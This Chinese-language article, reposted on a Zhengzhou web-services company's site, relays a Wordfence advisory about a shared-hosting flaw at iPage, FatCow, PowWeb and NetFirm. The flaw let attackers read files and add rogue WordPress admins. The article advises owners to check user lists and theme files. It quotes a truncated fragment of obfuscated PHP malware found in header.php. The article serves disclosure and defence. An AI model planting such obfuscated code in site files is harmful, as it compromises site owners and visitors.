• 17630273926
在iPage,FatCow,PowWeb和NetFirm中发现的Web主机漏洞
作者:郑州云优化 / 2019-11-12 16:52 / 浏览次数:
在iPage,FatCow,PowWeb和NetFirm中发现的Web主机漏洞
WordFence宣布他们在四家托管公司中发现了一个漏洞。WordFence警告说,在修补此漏洞的同时,有可能在修复此漏洞之前对网站进行了黑客攻击。
服务器设置允许黑客创建WordPress管理员帐户,通过在WordPress主题中添加流氓代码可以利用这些帐户来利用网站。
WordFence敦促网站管理员检查其网站上是否存在恶意管理员帐户,如果它们托管在iPage,FatCow,PowWeb或NetFirm上。这四个公司均归同一公司EnduranceInternationalGroup所有。
什么是服务器漏洞?
受影响的服务器具有权限和文件设置,允许攻击者查看敏感文件。其他漏洞使攻击者可以访问数据库,将自己添加为管理员,然后接管该站点。
WordFence就是这样描述此漏洞的:
“存在导致此漏洞的四个条件:
1.客户文件全部存储在共享文件系统中。
2.用户的Web根目录的完整路径是公用的,或者可以猜测。
3.到客户站点根目录的路径中的所有目录都是世界可遍历的(“所有用户”的执行位为1)或组可遍历的(“group”的执行位为1),并且敏感文件是全球可读的(“所有用户”的读取位为1)或组可读的(“组”的读取位为1)。
4.攻击者可能导致www组中运行的程序在任意位置读取文件。”
站点可能被感染
WordFence警告说,在修复此漏洞之前,有一段时间可能会感染这四个主机提供商上托管的站点。
建议网站所有者检查其用户列表,以确保没有未经授权的管理员。如果您的网站受到影响,则应该在主题中添加恶意代码。
这是WordFence如何描述恶意代码:
“如果在修复之前就利用了您的网站,则攻击者可能添加了仍可能存在的恶意软件。我们的客户在活动主题的header.php文件顶部添加了混淆的代码,类似于以下代码:
<?php${“\x47\x4c\x4f\x42\x41\x4c\x53”}[“dd\x70\x68z\x67\x64gx”]=“sl\x77k\x77i”;${“\x47\x4cO\x42\x41L\x53“}[”c\x7a\x66\x6dubkdo\x6a\x78“]=”\x6c\x6f\x63\x61t\x69\x6fn“;${”\x47\x4c\x4fB\x41LS”}[“\x67\x64\x64e\x74\x62p\x75f\x65i”]=”\x68t\x6d\x6c”;${“\x47\x4cOB\x41\x4cS”}[[\\x77i\x64\x68\x6bv\x6da“]=”\x73t\x72\x66“;${”\x47\x4c\x4f\x42\x41\x4c\x53“}[”\x66s\x75\x71\x79\x6evw“]=“b\x6f\x74”;${“\x47\x4cOBAL\x53”}[“w\x6c\x79\x63\x61\x76\x62\x71\x68\x6f\x6c\x75”]=”cac\x68\x65“;${“G\x4cO\x42\x41L\x53”}[”ry\x68\x72ku\x6b“]=”\x73\x63h\x65\x6d\x65“;${”\x47\x4c\x4f\x42\x41L\x53“}[”\x74\x6a\x6bc\x64e\x65\x69w“]=”\x73l\x77k\x77i\x32“;${“G\x4cOBA\x4cS”}[“\x79\x65\x64\x73\x67\x6ah\x69\x73\x67”]=“\x73\x6c\x74l\x65\x69l\x73”;“
漏洞已修复
WordFence在发布公告之前向托管公司披露了该漏洞。托管公司立即修复了漏洞。
但是,根据WordFence提供的指导,您可能希望检查用户列表中的恶意管理员级别帐户,并查看header.php文件中的恶意代码。
【郑州云优化】郑州SEO、网站建设、网站设计、服务器空间租售、网站维护、网站托管、网站优化、百度推广、自媒体营销、微信公众号
如有意向---联系我们
热门栏目
热门资讯
热门标签

网站建设 网站托管 成功案例 新闻动态 关于我们 联系我们 服务器空间 加盟合作 网站优化

备案号:ICP备*********号 网站地图/sitemap 

公司地址:河南省郑州市郑州云优化 咨询QQ:1774525808 手机:17630273926 电话:17630273926